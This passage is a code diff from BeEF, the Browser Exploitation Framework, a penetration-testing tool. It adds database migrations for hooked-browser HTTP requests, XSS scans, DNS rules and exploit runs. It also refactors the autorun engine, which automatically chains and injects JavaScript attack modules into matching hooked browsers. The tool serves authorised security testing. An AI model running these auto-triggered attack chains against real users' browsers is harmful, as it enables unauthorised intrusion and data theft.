@@ -0,0 +1,44 @@
+class CreateHttp < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :http do |t|
+            t.references :hooked_browser
+            # The http request to perform. In clear text.
+            t.text :request
+            # Boolean value as string to say whether cross-domain requests are allowed
+            t.boolean :allow_cross_domain, :default => true
+            # The http response body received. In clear text.
+            t.text :response_data
+            # The http response code. Useful to handle cases like 404, 500, 302, ...
+            t.integer :response_status_code
+            # The http response code. Human-readable code: success, error, ecc..
+            t.text :response_status_text
+            # The port status. closed, open or not http
+            t.text :response_port_status
+            # The XHR Http response raw headers
+            t.text :response_headers
+            # The http response method. GET or POST.
+            t.text :method
+            # The content length for the request.
+            t.text :content_length, :default => 0
+            # The request protocol/scheme (http/https)
+            t.text :proto
+            # The domain on which perform the request.
+            t.text :domain
+            # The port on which perform the request.
+            t.text :port
+            # Boolean value to say if the request was cross-domain
+            t.text :has_ran, :default => "waiting"
+            # The path of the request.
+            # Example: /secret.html
+            t.text :path
+            # The date at which the http response has been saved.
+            t.datetime :response_date
+            # The date at which the http request has been saved.
+            t.datetime :request_date
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/016_create_rtc_status.rb
+++ b/core/main/ar-migrations/016_create_rtc_status.rb
@@ -0,0 +1,13 @@
+class CreateRtcStatus < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :rtc_status do |t|
+            t.references :hooked_browser
+            t.integer :target_hooked_browser_id
+            t.text :status
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/017_create_rtc_manage.rb
+++ b/core/main/ar-migrations/017_create_rtc_manage.rb
@@ -0,0 +1,13 @@
+class CreateRtcManage < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :rtc_manage do |t|
+            t.references :hooked_browser
+            t.text :message
+            t.text :has_sent, default: "waiting"
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/018_create_rtc_signal.rb
+++ b/core/main/ar-migrations/018_create_rtc_signal.rb
@@ -0,0 +1,14 @@
+class CreateRtcSignal < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :rtc_signal do |t|
+            t.references :hooked_browser
+            t.integer :target_hooked_browser_id
+            t.text :signal
+            t.text :has_sent, default: "waiting"
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/019_create_rtc_module_status.rb
+++ b/core/main/ar-migrations/019_create_rtc_module_status.rb
@@ -0,0 +1,14 @@
+class CreateRtcModuleStatus < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :rtc_module_status do |t|
+            t.references :hooked_browser
+            t.references :command_module
+            t.integer :target_hooked_browser_id
+            t.text :status
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/020_create_xssrays_detail.rb
+++ b/core/main/ar-migrations/020_create_xssrays_detail.rb
@@ -0,0 +1,14 @@
+class CreateXssraysDetail < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :xssrays_detail do |t|
+            t.references :hooked_browser
+            t.text :vector_name
+            t.text :vector_method
+            t.text :vector_poc
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/021_create_dns_rule.rb
+++ b/core/main/ar-migrations/021_create_dns_rule.rb
@@ -0,0 +1,14 @@
+class CreateDnsRule < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :dns_rule do |t|
+          t.text :pattern
+          t.text :resource
+          t.text :response
+          t.text :callback
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/022_create_ipec_exploit.rb
+++ b/core/main/ar-migrations/022_create_ipec_exploit.rb
@@ -0,0 +1,13 @@
+class CreateIpecExploit < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :ipec_exploit do |t|
+            t.text :name
+            t.text :protocol
+            t.text :os
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/023_create_ipec_exploit_run.rb
+++ b/core/main/ar-migrations/023_create_ipec_exploit_run.rb
@@ -0,0 +1,13 @@
+class CreateIpecExploitRun < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :ipec_exploit_run do |t|
+            t.boolean :launched
+            t.text :http_headers
+            t.text :junk_size
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/024_create_autoloader.rb
+++ b/core/main/ar-migrations/024_create_autoloader.rb
@@ -0,0 +1,12 @@
+class CreateAutoloader < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :autoloader do |t|
+            t.references :command
+            t.boolean :in_use
+		end
+
+	end
+
+end
--- a/core/main/ar-migrations/025_create_xssrays_scan.rb
+++ b/core/main/ar-migrations/025_create_xssrays_scan.rb
@@ -0,0 +1,18 @@
+class CreateXssraysScan < ActiveRecord::Migration[6.0]
+
+	def change
+
+		create_table :xssrays_scan do |t|
+            t.references :hooked_browser
+            t.datetime :scan_start
+            t.datetime :scan_finish
+            t.text :domain
+            t.text :cross_domain
+            t.integer :clean_timeout
+            t.boolean :is_started
+            t.boolean :is_finished
+		end
+
+	end
+
+end
--- a/core/main/autorun_engine/engine.rb
+++ b/core/main/autorun_engine/engine.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -24,6 +24,14 @@ module BeEF
          @VERSION_STR = ['XP','Vista']
        end

+        # Check if the hooked browser type/version and OS type/version match any Rule-sets
+        # stored in the BeEF::Core::AutorunEngine::Models::Rule database table
+        # If one or more Rule-sets do match, trigger the module chain specified
+        def run(hb_id, browser_name, browser_version, os_name, os_version)
+          are = BeEF::Core::AutorunEngine::Engine.instance
+          match_rules = are.match(browser_name, browser_version, os_name, os_version)
+          are.trigger(match_rules, hb_id) if match_rules !=nil && match_rules.length > 0
+        end

        # Prepare and return the JavaScript of the modules to be sent.
        # It also updates the rules ARE execution table with timings
@@ -33,7 +41,7 @@ module BeEF
          hb_session = hb.session

          rule_ids.each do |rule_id|
-            rule = BeEF::Core::AutorunEngine::Models::Rule.get(rule_id)
+            rule = BeEF::Core::Models::Rule.find(rule_id)
            modules = JSON.parse(rule.modules)

            execution_order = JSON.parse(rule.execution_order)
@@ -44,8 +52,12 @@ module BeEF
            mods_codes = Array.new
            mods_conditions = Array.new

+            # this ensures that if both rule A and rule B call the same module in sequential mode,
+            # execution will be correct preventing wrapper functions to be called with equal names.
+            rule_token = SecureRandom.hex(5)
+
            modules.each do |cmd_mod|
-              mod = BeEF::Core::Models::CommandModule.first(:name => cmd_mod['name'])
+              mod = BeEF::Core::Models::CommandModule.where(:name => cmd_mod['name']).first
              options = []
              replace_input = false
              cmd_mod['options'].each do|k,v|
@@ -53,7 +65,9 @@ module BeEF
                replace_input = true if v == '<<mod_input>>'
              end

-              command_body = prepare_command(mod, options, hb_id, replace_input)
+              command_body = prepare_command(mod, options, hb_id, replace_input, rule_token)
+
+
              mods_bodies.push(command_body)
              mods_codes.push(cmd_mod['code'])
              mods_conditions.push(cmd_mod['condition'])
@@ -62,23 +76,25 @@ module BeEF
            # Depending on the chosen chain mode (sequential or nested/forward), prepare the appropriate wrapper
            case chain_mode
              when 'nested-forward'
-                wrapper = prepare_nested_forward_wrapper(mods_bodies, mods_codes, mods_conditions, execution_order)
+                wrapper = prepare_nested_forward_wrapper(mods_bodies, mods_codes, mods_conditions, execution_order, rule_token)
              when 'sequential'
-                wrapper = prepare_sequential_wrapper(mods_bodies, execution_order, execution_delay)
+                wrapper = prepare_sequential_wrapper(mods_bodies, execution_order, execution_delay, rule_token)
              else
                wrapper = nil
+                print_error "Chain mode looks wrong!"
                # TODO catch error, which should never happen as values are checked way before ;-)
            end

-            are_exec = BeEF::Core::AutorunEngine::Models::Execution.new(
+            are_exec = BeEF::Core::Models::Execution.new(
                :session => hb_session,
                :mod_count => modules.length,
                :mod_successful => 0,
+                :rule_token => rule_token,
                :mod_body => wrapper,
                :is_sent => false,
                :rule_id => rule_id
            )
-            are_exec.save
+            are_exec.save!
            # Once Engine.check() verified that the hooked browser match a Rule, trigger the Rule ;-)
            print_more "Triggering ruleset #{rule_ids.to_s} on HB #{hb_id}"
          end
@@ -93,19 +109,19 @@ module BeEF
        #         setTimeout(module_three(), 3000);
        # Note: no result status is checked here!! Useful if you just want to launch a bunch of modules without caring
        #  what their status will be (for instance, a bunch of XSRFs on a set of targets)
-        def prepare_sequential_wrapper(mods, order, delay)
+        def prepare_sequential_wrapper(mods, order, delay, rule_token)
          wrapper = ''
          delayed_exec = ''
          c = 0
-
          while c < mods.length
-            delayed_exec += %Q| setTimeout("#{mods[order[c]][:mod_name]}();", #{delay[c]}); |
-            wrapped_mod = "#{mods[order[c]][:mod_body]}\n"
+            delayed_exec += %Q| setTimeout(function(){#{mods[order[c]][:mod_name]}_#{rule_token}();}, #{delay[c]}); |
+            mod_body = mods[order[c]][:mod_body].to_s.gsub("#{mods[order[c]][:mod_name]}_mod_output", "#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output")
+            wrapped_mod = "#{mod_body}\n"
            wrapper += wrapped_mod
            c += 1
          end
          wrapper += delayed_exec
-          print_more "Final Modules Wrapper:\n #{delayed_exec}" if @debug_on
+          print_more "Final Modules Wrapper:\n #{wrapper}" if @debug_on
          wrapper
        end

@@ -124,7 +140,7 @@ module BeEF
        # Note: Useful in situations where you want to launch 2 modules, where the second one will execute only
        #     if the first once return with success. Also, the second module has the possibility of mangling first
        #     module output and use it as input for some of its module inputs.
-        def prepare_nested_forward_wrapper(mods, code, conditions, order)
+        def prepare_nested_forward_wrapper(mods, code, conditions, order, rule_token)
          wrapper, delayed_exec = '',''
          delayed_exec_footers = Array.new
          c = 0
@@ -148,8 +164,8 @@ module BeEF
            if c == 0
              # this is the first wrapper to prepare
              delayed_exec += %Q|
-                function #{mods[order[c]][:mod_name]}_f(){
-                  #{mods[order[c]][:mod_name]}();
+                function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){
+                  #{mods[order[c]][:mod_name]}_#{rule_token}();

                  // TODO add timeout to prevent infinite loops
                  function isResReady(mod_result, start){
@@ -165,8 +181,8 @@ module BeEF
                          }
                          var status = mod_result[0];
                       if(#{conditions[i]}){
-                         #{mods[order[i]][:mod_name]}_can_exec = true;
-                         #{mods[order[c]][:mod_name]}_mod_output = mod_result[1];
+                         #{mods[order[i]][:mod_name]}_#{rule_token}_can_exec = true;
+                         #{mods[order[c]][:mod_name]}_#{rule_token}_mod_output = mod_result[1];
              |

              delayed_exec_footer = %Q|
@@ -174,20 +190,22 @@ module BeEF
                    }
                  }
                  var start = (new Date()).getTime();
-                  var resultReady = setInterval(function(){var start = (new Date()).getTime(); isResReady(#{mods[order[c]][:mod_name]}_mod_output, start);},#{@result_poll_interval});
+                  var resultReady = setInterval(function(){var start = (new Date()).getTime(); isResReady(#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output, start);},#{@result_poll_interval});
                }
-                #{mods[order[c]][:mod_name]}_f();
+                #{mods[order[c]][:mod_name]}_#{rule_token}_f();
              |

              delayed_exec_footers.push(delayed_exec_footer)

            elsif c < mods.length - 1
+              code_snippet = code_snippet.to_s.gsub(mods[order[c-1]][:mod_name], "#{mods[order[c-1]][:mod_name]}_#{rule_token}")
+
              # this is one of the wrappers in the middle of the chain
              delayed_exec += %Q|
-                function #{mods[order[c]][:mod_name]}_f(){
-                  if(#{mods[order[c]][:mod_name]}_can_exec){
+                function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){
+                  if(#{mods[order[c]][:mod_name]}_#{rule_token}_can_exec){
                     #{code_snippet}
-                     #{mods[order[c]][:mod_name]}(#{mod_input});
+                     #{mods[order[c]][:mod_name]}_#{rule_token}(#{mod_input});
                     function isResReady(mod_result, start){
                        if (mod_result === null && parseInt(((new Date().getTime()) - start)) < #{@result_poll_timeout}){
                           // loop
@@ -201,8 +219,8 @@ module BeEF
                          }
                          var status = mod_result[0];
                          if(#{conditions[i]}){
-                             #{mods[order[i]][:mod_name]}_can_exec = true;
-                             #{mods[order[c]][:mod_name]}_mod_output = mod_result[1];
+                             #{mods[order[i]][:mod_name]}_#{rule_token}_can_exec = true;
+                             #{mods[order[c]][:mod_name]}_#{rule_token}_mod_output = mod_result[1];
              |

              delayed_exec_footer = %Q|
@@ -210,26 +228,28 @@ module BeEF
                       }
                     }
                     var start = (new Date()).getTime();
-                     var resultReady = setInterval(function(){ isResReady(#{mods[order[c]][:mod_name]}_mod_output, start);},#{@result_poll_interval});
+                     var resultReady = setInterval(function(){ isResReady(#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output, start);},#{@result_poll_interval});
                  }
                }
-                #{mods[order[c]][:mod_name]}_f();
+                #{mods[order[c]][:mod_name]}_#{rule_token}_f();
              |

              delayed_exec_footers.push(delayed_exec_footer)
            else
+              code_snippet = code_snippet.to_s.gsub(mods[order[c-1]][:mod_name], "#{mods[order[c-1]][:mod_name]}_#{rule_token}")
              # this is the last wrapper to prepare
              delayed_exec += %Q|
-                function #{mods[order[c]][:mod_name]}_f(){
-                  if(#{mods[order[c]][:mod_name]}_can_exec){
+                function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){
+                  if(#{mods[order[c]][:mod_name]}_#{rule_token}_can_exec){
                     #{code_snippet}
-                     #{mods[order[c]][:mod_name]}(#{mod_input});
+                     #{mods[order[c]][:mod_name]}_#{rule_token}(#{mod_input});
                  }
                }
-                #{mods[order[c]][:mod_name]}_f();
+                #{mods[order[c]][:mod_name]}_#{rule_token}_f();
              |
            end
-            wrapped_mod = "#{mods[order[c]][:mod_body]}\n"
+            mod_body = mods[order[c]][:mod_body].to_s.gsub("#{mods[order[c]][:mod_name]}_mod_output", "#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output")
+            wrapped_mod = "#{mod_body}\n"
            wrapper += wrapped_mod
            c += 1
          end
@@ -242,7 +262,7 @@ module BeEF
        # prepare the command module (compiling the Erubis templating stuff), eventually obfuscate it,
        # and store it in the database.
        # Returns the raw module body after template substitution.
-        def prepare_command(mod, options, hb_id, replace_input)
+        def prepare_command(mod, options, hb_id, replace_input, rule_token)
          config = BeEF::Core::Configuration.instance
          begin
            command = BeEF::Core::Models::Command.new(
@@ -252,9 +272,9 @@ module BeEF
                :creationdate => Time.new.to_i,
                :instructions_sent => true
            )
-            command.save
+            command.save!

-            command_module = BeEF::Core::Models::CommandModule.first(:id => mod.id)
+            command_module = BeEF::Core::Models::CommandModule.find(mod.id)
            if (command_module.path.match(/^Dynamic/))
              # metasploit and similar integrations
              command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
@@ -285,11 +305,11 @@ module BeEF

            replace_input ? mod_input = 'mod_input' : mod_input = ''
            result = %Q|
-                var #{mod.name} = function(#{mod_input}){
+                var #{mod.name}_#{rule_token} = function(#{mod_input}){
                    #{clean_command_body(command_body, replace_input)}
                };
-                var #{mod.name}_can_exec = false;
-                var #{mod.name}_mod_output = null;
+                var #{mod.name}_#{rule_token}_can_exec = false;
+                var #{mod.name}_#{rule_token}_mod_output = null;
            |

            return {:mod_name => mod.name, :mod_body => result}
@@ -307,12 +327,16 @@ module BeEF
          begin
            cmd_body = command_body.lines.map(&:chomp)
            wrapper_start_index,wrapper_end_index = nil
+
            cmd_body.each_with_index do |line, index|
-              if line.include?('beef.execute(function()')
+              if line.to_s =~ /^(beef|[a-zA-Z]+)\.execute\(function\(\)/
                wrapper_start_index = index
                break
              end
            end
+            if wrapper_start_index.nil?
+              print_error "[ARE] Could not find module start index"
+            end

            cmd_body.reverse.each_with_index do |line, index|
              if line.include?('});')
@@ -320,8 +344,14 @@ module BeEF
                break
              end
            end
+            if wrapper_end_index.nil?
+              print_error "[ARE] Could not find module end index"
+            end

-            cleaned_cmd_body = cmd_body.slice(wrapper_start_index+1..-(wrapper_end_index+2)).join("\n")
+            cleaned_cmd_body = cmd_body.slice(wrapper_start_index..-(wrapper_end_index+1)).join("\n")
+            if cleaned_cmd_body.eql?('')
+              print_error "[ARE] No command to send"
+            end

            # check if <<mod_input>> should be replaced with a variable name (depending if the variable is a string or number)
            if replace_input
@@ -339,7 +369,7 @@ module BeEF
              return cleaned_cmd_body
            end
          rescue =>  e
-            print_error "[ARE] There is likely a problem with the module's command.js parsing. Check Engine.clean_command_body.dd"
+            print_error "[ARE] There is likely a problem with the module's command.js parsing. Check Engine.clean_command_body"
          end
        end

@@ -355,11 +385,12 @@ module BeEF
        def match(browser, browser_version, os, os_version, rule_id=nil)
          match_rules = []
          if rule_id != nil
-            rules = [BeEF::Core::AutorunEngine::Models::Rule.get(rule_id)]
+            rules = [BeEF::Core::Models::Rule.find(rule_id)]
          else
-            rules = BeEF::Core::AutorunEngine::Models::Rule.all()
+            rules = BeEF::Core::Models::Rule.all
          end
          return nil if rules == nil
+          return nil unless rules.length > 0

          print_info "[ARE] Checking if any defined rules should be triggered on target."
          # TODO handle cases where there are multiple ARE rules for the same hooked browser.
@@ -402,19 +433,29 @@ module BeEF
              next unless @VERSION.include?(os_ver_rule_cond) || @VERSION_STR.include?(os_ver_rule_cond)
              # os_ver without checks as it can be very different or even empty, for instance on linux/bsd)

-              # check if the browser and OS types do match
-              next unless rule.browser == 'ALL'  || browser == rule.browser
-              next unless rule.os == 'ALL'       || os == rule.os
-
-              # check if the browser version match
-              browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s)
-              if browser_version_match
-                browser_match = true
+              # skip rule unless the browser matches
+              browser_match = false
+              # check if rule specifies multiple browsers
+              if rule.browser !~ /\A[A-Z]+\Z/
+                rule.browser.gsub(/[^A-Z,]/i, '').split(',').each do |b|
+                  browser_match = true if b == browser || b == 'ALL'
+                end
+              # else, only one browser
              else
-                browser_match = false
+                next unless rule.browser == 'ALL' || browser == rule.browser
+                # check if the browser version matches
+                browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s)
+                if browser_version_match
+                  browser_match = true
+                else
+                  browser_match = false
+                end
+                print_more "Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : #{browser_version_match}"
              end
+              next unless browser_match

-              print_more "Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : #{browser_version_match}"
+              # skip rule unless the OS matches
+              next unless rule.os == 'ALL' || os == rule.os

              # check if the OS versions match
              if os_version != nil || rule.os_version != 'ALL'
--- a/core/main/autorun_engine/models/execution.rb
+++ b/core/main/autorun_engine/models/execution.rb
@@ -1,30 +0,0 @@
-#
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-
-module BeEF
-  module Core
-    module AutorunEngine
-      module Models
-        # @note Stored info about the execution of the ARE on hooked browsers.
-        class Execution
-
-          include DataMapper::Resource
-
-          storage_names[:default] = 'core_areexecution'
-
-          property :id, Serial
-          property :session, Text                         # hooked browser session where a ruleset triggered
-          property :mod_count, Integer                    # number of command modules of the ruleset
-          property :mod_successful, Integer               # number of command modules that returned with success
-          # By default Text is only 65K, so field length increased to 1 MB
-          property :mod_body, Text,    :length => 1024000 # entire command module(s) body to be sent
-          property :exec_time, String, :length => 15      # timestamp of ruleset triggering
-          property :is_sent, Boolean
-        end
-      end
-    end
-  end
-end
--- a/core/main/autorun_engine/models/rule.rb
+++ b/core/main/autorun_engine/models/rule.rb
@@ -1,34 +0,0 @@
-#
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-
-module BeEF
-  module Core
-    module AutorunEngine
-      module Models
-        # @note Table stores the rules for the Distributed Engine.
-        class Rule
-          include DataMapper::Resource
-
-          storage_names[:default] = 'core_arerules'
-
-          property :id, Serial
-          property :name, Text                                       # rule name
-          property :author, String                                   # rule author
-          property :browser, String, :length => 10                   # browser name
-          property :browser_version, String, :length => 15           # browser version
-          property :os, String, :length => 10                        # OS name
-          property :os_version, String, :length => 15                # OS version
-          property :modules, Text                                    # JSON stringyfied representation of the JSON rule for further parsing
-          property :execution_order, Text                            # command module execution order
-          property :execution_delay, Text                            # command module time delays
-          property :chain_mode, String, :length => 40                 # rule chaining mode
-
-          has n, :executions
-        end
-      end
-    end
-  end
-end
--- a/core/main/autorun_engine/parser.rb
+++ b/core/main/autorun_engine/parser.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -28,13 +28,19 @@ module BeEF
            return [false, 'Illegal chain_mode definition'] unless CHAIN_MODE.include?(chain_mode)
            return [false, 'Illegal rule name'] unless BeEF::Filters.is_non_empty_string?(name)
            return [false, 'Illegal author name'] unless BeEF::Filters.is_non_empty_string?(author)
-
-            return [false, 'Illegal browser definition'] unless BROWSER.include?(browser)
-
-            if browser_version != 'ALL'
-              return [false, 'Illegal browser_version definition'] unless
+            # if multiple browsers were specified, check each browser
+            if browser.kind_of?(Array)
+              browser.each do |b|
+                return [false, 'Illegal browser definition'] unless BROWSER.include?(b)
+              end
+            # else, if only one browser was specified, check browser and browser version
+            else
+              return [false, 'Illegal browser definition'] unless BROWSER.include?(browser)
+              if browser_version != 'ALL'
+                return [false, 'Illegal browser_version definition'] unless
                  VERSION.include?(browser_version[0,2].gsub(/\s+/,'')) &&
                      BeEF::Filters::is_valid_browserversion?(browser_version[2..-1].gsub(/\s+/,'')) && browser_version.length < MAX_VER_LEN
+              end
            end

            if os_version != 'ALL'
@@ -47,7 +53,7 @@ module BeEF

            # check if module names, conditions and options are ok
            modules.each do |cmd_mod|
-              mod = BeEF::Core::Models::CommandModule.first(:name => cmd_mod['name'])
+              mod = BeEF::Core::Models::CommandModule.where(:name => cmd_mod['name']).first
              if mod != nil
                modk = BeEF::Module.get_key_by_database_id(mod.id)
                mod_options = BeEF::Module.get_options(modk)
@@ -69,6 +75,9 @@ module BeEF
            exec_order.each{ |order| return [false, 'execution_order values must be Integers'] unless order.integer?}
            exec_delay.each{ |delay| return [false, 'execution_delay values must be Integers'] unless delay.integer?}

+            return [false, 'execution_order and execution_delay values must be consistent with modules numbers'] unless
+                modules.size == exec_order.size && modules.size == exec_delay.size
+
            success
          rescue => e
            print_error "#{e.message}"
--- a/core/main/autorun_engine/rule_loader.rb
+++ b/core/main/autorun_engine/rule_loader.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -13,6 +13,7 @@ module BeEF

        def initialize
          @config = BeEF::Core::Configuration.instance
+          @debug_on = @config.get('beef.debug')
        end

        # this expects parsed JSON as input
@@ -35,9 +36,10 @@ module BeEF

            if parser_result.length == 1 && parser_result.first
              print_info "[ARE] Ruleset (#{name}) parsed and stored successfully."
-              print_more "Target Browser: #{browser} (#{browser_version})"
-              print_more "Target OS: #{os} (#{os_version})"
-              print_more "Modules to Trigger:"
+              if @debug_on
+                print_more "Target Browser: #{browser} (#{browser_version})"
+                print_more "Target OS: #{os} (#{os_version})"
+                print_more "Modules to Trigger:"
                         modules.each do |mod|
                            print_more "(*) Name: #{mod['name']}"
                            print_more "(*) Condition: #{mod['condition']}"
@@ -47,9 +49,10 @@ module BeEF
                              print_more "\t#{key}: (#{value})"
                            end
                         end
-              print_more "Exec order: #{exec_order}"
-              print_more "Exec delay: #{exec_delay}"
-              are_rule = BeEF::Core::AutorunEngine::Models::Rule.new(
+                print_more "Exec order: #{exec_order}"
+                print_more "Exec delay: #{exec_delay}"
+              end
+              are_rule = BeEF::Core::Models::Rule.new(
                  :name => name,
                  :author => author,
                  :browser => browser,
@@ -85,7 +88,7 @@ module BeEF

        def load_directory
          Dir.glob("#{$root_dir}/arerules/enabled/**/*.json") do |rule|
-            print_info "[ARE] Processing rule: #{rule}"
+            print_debug "[ARE] Processing rule: #{rule}"
            self.load_file rule
          end
        end
--- a/core/main/client/are.js
+++ b/core/main/client/are.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/beef.js
+++ b/core/main/client/beef.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -12,66 +12,72 @@
 $j = jQuery.noConflict();

 if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
-	
-	var BeefJS = {
-		
-		version: '<%= @beef_version %>',
-		
-		// This get set to true during window.onload(). It's a useful hack when messing with document.write().
-		pageIsLoaded: false,
-		
-		// An array containing functions to be executed by the window.onpopstate() method.
-		onpopstate: new Array(),
-		
-		// An array containing functions to be executed by the window.onclose() method.
-		onclose: new Array(),
-		
-		// An array containing functions to be executed by Beef.
-		commands: new Array(),
-		
-		// An array containing all the BeEF JS components.
-		components: new Array(),

-                /**
-                 * Adds a function to display debug messages (wraps console.log())
-                 * @param: {string} the debug string to return
-                 */
-                debug: function(msg) {
-                    if (!<%= @client_debug %>) return;
-                    if (typeof console == "object" && typeof console.log == "function") {
-                        console.log(msg);
-                    } else {
-                        // TODO: maybe add a callback to BeEF server for debugging purposes
-                        //window.alert(msg);
-                    }
-                },
+    var BeefJS = {

-		/**
-		 * Adds a function to execute.
-		 * @param: {Function} the function to execute.
-		 */
-		execute: function(fn) {
-            if ( typeof  beef.websocket == "undefined"){
-                 this.commands.push(fn);
-            }else{
-                fn();
+        version: '<%= @beef_version %>',
+
+        // This get set to true during window.onload(). It's a useful hack when messing with document.write().
+        pageIsLoaded: false,
+
+        // An array containing functions to be executed by the window.onpopstate() method.
+        onpopstate: new Array(),
+
+        // An array containing functions to be executed by the window.onclose() method.
+        onclose: new Array(),
+
+        // An array containing functions to be executed by Beef.
+        commands: new Array(),
+
+        // An array containing all the BeEF JS components.
+        components: new Array(),
+
+        /**
+         * Adds a function to display debug messages (wraps console.log())
+         * @param: {string} the debug string to return
+         */
+        debug: function(msg) {
+            if (!<%= @client_debug %>) return;
+            if (typeof console == "object" && typeof console.log == "function") {
+                var currentdate = new Date();
+                var pad = function(n){return ("0" + n).slice(-2);}
+                var datetime = currentdate.getFullYear() + "-"
+                + pad(currentdate.getMonth()+1)  + "-"
+                + pad(currentdate.getDate()) + " "
+                + pad(currentdate.getHours()) + ":"
+                + pad(currentdate.getMinutes()) + ":"
+                + pad(currentdate.getSeconds());
+                console.log('['+datetime+'] '+msg);
+            } else {
+                // TODO: maybe add a callback to BeEF server for debugging purposes
+                //window.alert(msg);
            }
        },

+        /**
+        * Adds a function to execute.
+        * @param: {Function} the function to execute.
+        */
+        execute: function(fn) {
+                if ( typeof  beef.websocket == "undefined"){
+                    this.commands.push(fn);
+                }else{
+                    fn();
+                }
+        },

+       /**
+        * Registers a component in BeEF JS.
+        * @params: {String} the component.
+        *
+        * Components are very important to register so the framework does not
+        * send them back over and over again.
+        */
+        regCmp: function(component) {
+                this.components.push(component);
+        }

-		/**
-		 * Registers a component in BeEF JS.
-		 * @params: {String} the component.
-		 *
-		 * Components are very important to register so the framework does not
-		 * send them back over and over again.
-		 */
-		regCmp: function(component) {
-			this.components.push(component);
-		}
-	
    };
-	
-	window.beef = BeefJS;
+
+    window.beef = BeefJS;
 }
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
--- a/core/main/client/browser/cookie.js
+++ b/core/main/client/browser/cookie.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -72,6 +72,7 @@ beef.browser.cookie = {
 			";expires=Thu, 01-Jan-1970 00:00:01 GMT";
 		},

+	    /* Never stop the madness dear C. */
 		veganLol: function (){
 			var to_hell= '';
 			var min = 17;
--- a/core/main/client/browser/popup.js
+++ b/core/main/client/browser/popup.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -16,7 +16,7 @@ beef.browser.popup = {
 	
 		blocker_enabled: function ()
 		{
-			screenParams = beef.browser.getScreenSize();
+			screenParams = beef.hardware.getScreenSize();
 			var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
 			if (popUp == null || typeof(popUp)=='undefined') {   
 			  	return true;
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -140,7 +140,7 @@ beef.dom = {
            if ($j(this).attr('href') != '')
            {
                e.preventDefault();
